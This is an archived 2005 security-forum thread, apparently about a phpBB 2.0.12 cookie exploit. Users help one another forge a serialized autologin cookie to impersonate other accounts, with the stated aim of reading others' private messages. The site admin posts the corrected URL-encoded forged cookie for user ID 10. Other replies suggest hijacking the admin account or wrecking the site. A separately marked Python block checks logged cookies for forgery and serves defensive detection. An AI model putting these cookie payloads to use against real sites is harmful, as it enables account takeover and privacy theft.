IT Security and Insecurity Portal |
The .12 exploit. Quick question. |
|
Posted: Thu Mar 31, 2005 10:04 pm |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
I noticed that if you try to change user ID >9 the exploit stops working.
Is there a way around this? Or am I missing something when creating the cookie? |
|
|
|
|
Posted: Fri Apr 01, 2005 12:11 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Dude, just edit admin to the way you want or login as admin and then change the user through the admin panel. Or just screw the site up. It's your call. |
|
_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds |
|
|
|
Posted: Fri Apr 01, 2005 3:52 pm |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
Quote: | Dude, just edit admin to the way you want or login as admin and then change the user through the admin panel. Or just screw the site up. It's your call. |
See, that's my problem: not all websites have an admin user <9. So I try to login and it just doesn't work.
Example:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%2210%22%3B%7D
That should, if I'm doing this right, log me into user 10; however, it just logs me in as guest.
I'm not interested in screwing sites up, just reading a few PMs. |
|
|
|
|
|
|
|
|
Posted: Sat Apr 02, 2005 1:30 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
devn00b wrote: | Quote: | Dude, just edit admin to the way you want or login as admin and then change the user through the admin panel. Or just screw the site up. It's your call. |
See, that's my problem: not all websites have an admin user <9. So I try to login and it just doesn't work.
Example:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%2210%22%3B%7D
That should, if I'm doing this right, log me into user 10; however, it just logs me in as guest.
I'm not interested in screwing sites up, just reading a few PMs. |
If you urldecode() that stuff, you get this:
Code: |
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"10";}
|
This is serialized data, and you can see that it says "string with length 1 char and with value '10'". Can you spot the error?
The right version is this:
Code: |
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:2:"10";}
|
And in urlencoded style it will be:
Code: |
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2210%22%3B%7D
|
See ya! |
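Added example, not part of any post in this thread: a strict Python parser for the small subset of PHP serialize() output shown above, of the kind a defender can run over logged cookie values. It rejects values whose declared string length does not match the data (the s:1:"10" mistake) and flags an autologinid that is not a string; that a legitimate autologinid is always a string, and the names inspect_cookie and SAMPLES, are assumptions of this example.

```python
from urllib.parse import unquote_to_bytes

def _parse(buf, pos):
    """Parse one value of the serialize() subset seen in this thread (a, s, b, i)."""
    tag = buf[pos:pos + 2]
    if tag in (b"b:", b"i:"):
        end = buf.index(b";", pos)
        num = int(buf[pos + 2:end])
        return (bool(num) if tag == b"b:" else num), end + 1
    if tag == b"s:":
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start, stop = colon + 2, colon + 2 + length
        # The declared byte length must land exactly on the closing quote.
        bad = length < 0 or buf[colon + 1:start] != b'"' or buf[stop:stop + 2] != b'";'
        if bad:
            raise ValueError(f"string length {length} does not match data at offset {pos}")
        return buf[start:stop].decode("latin-1"), stop + 2
    if tag == b"a:":
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        if buf[colon + 1:colon + 2] != b"{":
            raise ValueError("array is missing '{'")
        pos, out = colon + 2, {}
        for _ in range(count):
            key, pos = _parse(buf, pos)
            out[key], pos = _parse(buf, pos)
        if buf[pos:pos + 1] != b"}":
            raise ValueError("array count does not match contents")
        return out, pos + 1
    raise ValueError(f"unsupported type at offset {pos}")

def inspect_cookie(raw):
    """Return a list of findings for one URL-encoded cookie value."""
    buf = unquote_to_bytes(raw)
    try:
        value, end = _parse(buf, 0)
        if end != len(buf):
            raise ValueError("trailing data after value")
    except ValueError as exc:
        return [f"malformed: {exc}"]
    # Assumption of this example: a legitimate autologinid is always a string.
    if isinstance(value, dict) and "autologinid" in value \
            and not isinstance(value["autologinid"], str):
        return ["autologinid is not a string"]
    return []

# The three cookie values quoted in this thread, used as sample input.
SAMPLES = ["a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%2210%22%3B%7D",
           "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2210%22%3B%7D",
           "s%3A0%3A%22%22%3B"]
```

Running inspect_cookie over SAMPLES reports the first value as malformed, the second as carrying a non-string autologinid, and the third (the empty string) as clean.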
|
|
|
|
|
|
|
|
Posted: Sat Apr 02, 2005 10:03 pm |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
Hey, thanks for the response, Waraxe. I knew it was something dumb I was missing. Isn't that always the case? |
|
|
|
|
Posted: Sun Apr 03, 2005 10:27 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
devn00b wrote: | Hey, thanks for the response, Waraxe. I knew it was something dumb I was missing. Isn't that always the case? |
LOL, sometimes maybe you're just too nervous |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Tue Apr 05, 2005 5:38 pm |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
Okay, last question, I swear. I've noticed a strange cookie from some sites:
s%3A0%3A%22%22%3B which = s:0:"";
Is this exploitable if I do some modifications to the normal cookie sploit? |
|
|
|
|
Posted: Wed Apr 06, 2005 11:27 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
You sure it's not a forum with the 2.0.13 fix on? Maybe heavily modified forums? |
|
_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds |
|
|
|
Posted: Wed Apr 06, 2005 1:04 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
devn00b wrote: | Okay, last question, I swear. I've noticed a strange cookie from some sites:
s%3A0%3A%22%22%3B which = s:0:"";
Is this exploitable if I do some modifications to the normal cookie sploit? |
Maybe this cookie is set up when the user has anonymous status (I mean, does not have uid/uname). |
|
|
|
|
All times are GMT